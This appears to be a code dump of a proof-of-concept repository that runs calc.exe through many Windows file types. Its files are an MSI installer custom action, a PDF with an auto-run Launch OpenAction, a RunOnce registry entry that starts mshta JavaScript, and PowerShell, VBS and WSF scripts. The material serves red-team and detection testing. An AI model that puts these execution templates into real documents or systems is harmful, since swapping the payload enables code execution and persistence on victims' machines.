https://raw.githubusercontent.com/dmcxblue/calc_poc/dfe0f4f4e308721df249395e22e2dd003c3c79b3/msi/calc.msi


--------------------------------------------------------------------------------
/msi/calc.wxs:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0"?>
 2 | <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
 3 |    <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" 
 4 |             Name="Calc Product Name" Version="0.0.1" Manufacturer="Calc Company Name" Language="1033">
 5 |       <Package InstallerVersion="200" Compressed="yes" InstallPrivileges="limited" Comments="Windows Installer Package"/>
 6 | 
 7 | 	  <CustomAction Id="StartAppOnExit" BinaryKey="CalcBinary"
 8 | 	    ExeCommand="" Execute="immediate" Return="asyncNoWait" />
 9 | 	  <Binary Id="CalcBinary" SourceFile="calc.exe"/>
10 |       <InstallExecuteSequence> 
11 |    	     <Custom Action='StartAppOnExit' Before='InstallInitialize' /> 
12 |       </InstallExecuteSequence> 
13 | 	  
14 |    </Product>
15 | </Wix>


--------------------------------------------------------------------------------
/pdf/calc.pdf:
--------------------------------------------------------------------------------
 1 | %PDF-1.1
 2 | 
 3 | 1 0 obj
 4 | <<
 5 |  /Type /Catalog
 6 |  /Outlines 2 0 R
 7 |  /Pages 3 0 R
 8 |  /OpenAction 8 0 R
 9 | >>
10 | endobj
11 | 
12 | 2 0 obj
13 | <<
14 |  /Type /Outlines
15 |  /Count 0
16 | >>
17 | endobj
18 | 
19 | 3 0 obj
20 | <<
21 |  /Type /Pages
22 |  /Kids [4 0 R]
23 |  /Count 1
24 | >>
25 | endobj
26 | 
27 | 4 0 obj
28 | <<
29 |  /Type /Page
30 |  /Parent 3 0 R
31 |  /MediaBox [0 0 612 792]
32 |  /Contents 5 0 R
33 |  /Resources 
34 |  << /ProcSet 6 0 R
35 |     /Font << /F1 7 0 R >>
36 |  >>
37 | >>
38 | endobj
39 | 
40 | 5 0 obj
41 | << /Length 46 >>
42 | stream
43 | BT
44 | /F1 24 Tf
45 | 100 700 Td
46 | (Hello World)Tj
47 | ET
48 | endstream
49 | endobj
50 | 
51 | 6 0 obj
52 | [/PDF /Text]
53 | endobj
54 | 
55 | 7 0 obj
56 | <<
57 |  /Type /Font
58 |  /Subtype /Type1
59 |  /Name /F1
60 |  /BaseFont /Helvetica
61 |  /Encoding /MacRomanEncoding
62 | >>
63 | endobj
64 | 
65 | 8 0 obj
66 | <<
67 |  /Type /Action
68 |  /S /Launch
69 |  /Win
70 |  <<
71 |   /F ("cmd.exe")
72 |   /P (/C calc.exe)
73 |  >>
74 | >>
75 | endobj
76 | 
77 | xref
78 | 0 9
79 | 0000000000 65535 f
80 | 0000000012 00000 n
81 | 0000000109 00000 n
82 | 0000000165 00000 n
83 | 0000000234 00000 n
84 | 0000000401 00000 n
85 | 0000000505 00000 n
86 | 0000000662 00000 n
87 | trailer
88 | <<
89 |  /Size 9
90 |  /Root 1 0 R
91 | >>
92 | startxref
93 | 751
94 | %%EOF
95 | 


--------------------------------------------------------------------------------
/pif/calc.pif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dmcxblue/calc_poc/dfe0f4f4e308721df249395e22e2dd003c3c79b3/pif/calc.pif


--------------------------------------------------------------------------------
/ps1/calc.ps1:
--------------------------------------------------------------------------------
1 | Invoke-Item c:\windows\system32\calc.exe


--------------------------------------------------------------------------------
/reg/calc.reg:
--------------------------------------------------------------------------------
1 | Windows Registry Editor Version 5.00
2 | 
3 | [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
4 | "calcpoc"="C:\\Windows\\System32\\mshta.exe \"javascript:(new ActiveXObject(\"WScript.Shell\")).Run(\"calc.exe\")\""


--------------------------------------------------------------------------------
/scr/calc.scr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dmcxblue/calc_poc/dfe0f4f4e308721df249395e22e2dd003c3c79b3/scr/calc.scr


--------------------------------------------------------------------------------
/vbe,vbs/calc.vbe:
--------------------------------------------------------------------------------
1 | Set objShell = CreateObject("Wscript.Shell")
2 | objShell.Run "c:\windows\system32\calc.exe"


--------------------------------------------------------------------------------
/vbe,vbs/calc.vbs:
--------------------------------------------------------------------------------
1 | Set objShell = CreateObject("Wscript.Shell")
2 | objShell.Run "c:\windows\system32\calc.exe"


--------------------------------------------------------------------------------
/wsf/calc.wsf:
--------------------------------------------------------------------------------
1 | <job id="IncludeExample">
2 |    <script language="VBScript">
3 |       Set objShell = CreateObject("Wscript.Shell")
4 |       objShell.Run "c:\windows\system32\calc.exe"
5 |    </script>
6 | </job>


--------------------------------------------------------------------------------
/xls/calc.xls:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dmcxblue/calc_poc/dfe0f4f4e308721df249395e22e2dd003c3c79b3/xls/calc.xls


--------------------------------------------------------------------------------